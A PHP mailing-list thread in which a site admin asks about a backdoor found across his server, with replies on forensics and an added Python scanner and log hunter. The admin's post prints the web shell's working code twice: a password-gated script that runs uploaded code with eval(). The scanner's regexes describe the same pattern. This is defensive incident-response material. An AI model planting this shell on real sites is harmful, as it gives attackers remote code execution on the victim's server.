Re: Re: Hack question

Eric Butera wrote:
On Fri, Apr 18, 2008 at 12:58 PM, Jim Lucas <lists@xxxxxxxxx> wrote:
Eric Butera wrote:

On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:

I'm continuing to work on this.

One thing that seems obvious. The code executes the script code, using
eval(), directly from the /tmp dir. So the usual security tests we do prior
to using move_uploaded_file() are useless.



 Al wrote:


I'm still fighting my hack problem on one of my servers. Can anyone help
me figure out what's the purpose of this code. The hack places this file in
numerous dirs on the site, I assume using a php script because the owner is
"nobody".

I can sort of figure what it is doing; but, I can't figure out what the
hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people.
I see no sign that any code is written by the site owner, i.e., ftp. And,
I've looked carefully for suspect php files.


<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t)
{ echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
"<pre>"; testdata('start'); if
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
testdata('end'); echo "</pre>"; ?>


<?php
error_reporting(1);          // E_ERROR only: keep warnings out of the victim's output and logs
global $HTTP_SERVER_VARS;    // unused; PHP 4-era superglobal alias

// Every branch prints md5("testdata_<tag>"). The values are fixed, so whoever
// drives the shell can tell from the response which branch ran
// (start / pass / f / end).
function say($t)
{
    echo "$t\n";
}
function testdata($t)
{
    say(md5("testdata_$t"));
}

echo "<pre>";
testdata('start');
// Gate: the POST field "p" must hash to the hard-coded md5 (the operator's password).
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
    // Read the multipart upload "f" straight from PHP's temp dir (its tmp_name)
    // and execute it. The file is never moved, so PHP deletes it when the
    // request ends.
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
                       $HTTP_POST_FILES["f"]["size"])) {
        eval($code);
    } else {
        testdata('f');       // no readable upload arrived
    }
} else {
    testdata('pass');        // wrong or missing password
}
testdata('end');
echo "</pre>";
?>


 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



Maybe you can look at the file time on the script in /tmp and look at
server logs around that same time to see if that is any hint of where
it might have come from.


 That won't work, the uploaded file is deleted after the
script/process/request is completed.  Standard PHP clean would get rid of
it.



 --
 Jim Lucas

   "Some men are born to greatness, some achieve greatness,
       and some have greatness thrust upon them."

 Twelfth Night, Act II, Scene V
    by William Shakespeare



There is a file in /tmp that got created at some point by a request.
That request happened at a given time.  That file got created at a
time.  Even though the /tmp/dkhfsdfkh is gone the exploit is there.  I
guess I don't know what else to say.


quote:http://us2.php.net/manual/en/features.file-upload.php

"The file will be deleted from the temporary directory at the end of the request if it has not been moved away or renamed."

/quote

In the example code above that is injected into the top of the php scripts, the eval is evaluating the code that is read from the temp file; the temp file is never moved or renamed. Therefore it will be removed when the script is done.


--
Jim Lucas

   "Some men are born to greatness, some achieve greatness,
       and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
    by William Shakespeare


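Added example (not code from any of the posts above): two offline checks that follow from the thread. The uploaded payload is gone once the request ends, so what remains to hunt for is the backdoor's own source and the web server's record of the POST that fed it. The scanner flags PHP source that reads an upload's tmp_name and passes it to eval(), or gates on md5($_POST[...]) against a hard-coded hash; the log hunt pulls out POSTs to .php paths that are not known form handlers. The Apache "combined" log format, the sample PHP snippets, the log lines and the allow-list are all assumptions constructed for the example.

```python
"""Offline hunt for an eval-an-upload PHP backdoor and for the requests that
drove it. Added example; sample sources, log lines and the handler allow-list
are constructed, and the log parser assumes Apache "combined" format."""
import hashlib
import re
from collections import namedtuple

# --- 1. source scan ---------------------------------------------------------
# Upload's tmp_name reached via the old ($HTTP_POST_FILES) or new ($_FILES) array.
READS_UPLOAD = re.compile(
    r'\$(?:HTTP_POST_FILES|_FILES)\s*\[[^\]]+\]\s*\[\s*["\']tmp_name["\']\s*\]')
CALLS_EVAL = re.compile(r'\beval\s*\(')
# md5($_POST[...]) compared with a literal 32-hex-digit string: the password gate.
MD5_GATE = re.compile(
    r'md5\s*\(\s*\$_POST\s*\[[^\]]+\]\s*\)\s*==\s*["\'][0-9a-f]{32}["\']')


def scan_source(php_source: str) -> list[str]:
    """Return findings for the contents of one PHP file (empty list = clean)."""
    findings = []
    if READS_UPLOAD.search(php_source) and CALLS_EVAL.search(php_source):
        findings.append("reads an uploaded file's tmp_name and calls eval()")
    if MD5_GATE.search(php_source):
        findings.append("gates on md5($_POST[...]) == hard-coded hash")
    return findings


def backdoor_markers() -> dict:
    """The fixed strings the shell prints per branch. Because they never
    change, they work as a response-body signature for a proxy or IDS rule."""
    return {tag: hashlib.md5(f"testdata_{tag}".encode()).hexdigest()
            for tag in ("start", "pass", "f", "end")}


# --- 2. access-log hunt -----------------------------------------------------
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

Hit = namedtuple("Hit", "ip ts path size")


def suspicious_posts(log_lines, known_post_handlers):
    """POSTs to .php paths that are not known form handlers. A shell dropped
    into, say, /images/2007/index.php is fed by exactly such a request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip
        path = m.group("path").split("?", 1)[0]
        if (m.group("method") == "POST" and path.endswith(".php")
                and path not in known_post_handlers):
            hits.append(Hit(m.group("ip"), m.group("ts"), path, m.group("size")))
    return hits


# --- constructed samples ----------------------------------------------------
SHELL_SRC = ('<?php if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ '
             'if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),'
             '$HTTP_POST_FILES["f"]["size"])){ eval($code); } } ?>')
BENIGN_SRC = ('<?php if (is_uploaded_file($_FILES["f"]["tmp_name"])) { '
              'move_uploaded_file($_FILES["f"]["tmp_name"], "/srv/uploads/" . '
              'basename($_FILES["f"]["name"])); } ?>')
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Apr/2008:12:01:03 -0400] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Apr/2008:12:01:09 -0400] "POST /contact.php HTTP/1.1" 302 0 "http://example.test/contact.php" "Mozilla/5.0"',
    '198.51.100.77 - - [18/Apr/2008:12:14:41 -0400] "POST /images/2007/index.php HTTP/1.1" 200 118 "-" "-"',
    '198.51.100.77 - - [18/Apr/2008:12:14:42 -0400] "POST /images/2007/index.php HTTP/1.1" 200 118 "-" "-"',
    '192.0.2.10 - - [18/Apr/2008:12:20:00 -0400] "GET /about.php?x=1 HTTP/1.1" 200 2200 "-" "curl/7.18"',
]
KNOWN_POST_HANDLERS = {"/contact.php", "/login.php"}   # assumed legitimate form targets

if __name__ == "__main__":
    print("shell  :", scan_source(SHELL_SRC))
    print("benign :", scan_source(BENIGN_SRC))
    print("markers:", backdoor_markers())
    for h in suspicious_posts(SAMPLE_LOG, KNOWN_POST_HANDLERS):
        print("POST to non-handler:", h)
```

Run the source scan over the whole docroot (the thread says the file was dropped into numerous dirs) and feed the real access log to suspicious_posts; the hits give the timestamps and client addresses to pivot on, which is the correlation Eric suggests even though /tmp itself holds nothing afterwards. Tune the allow-list to the site's real form handlers before trusting the log output.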


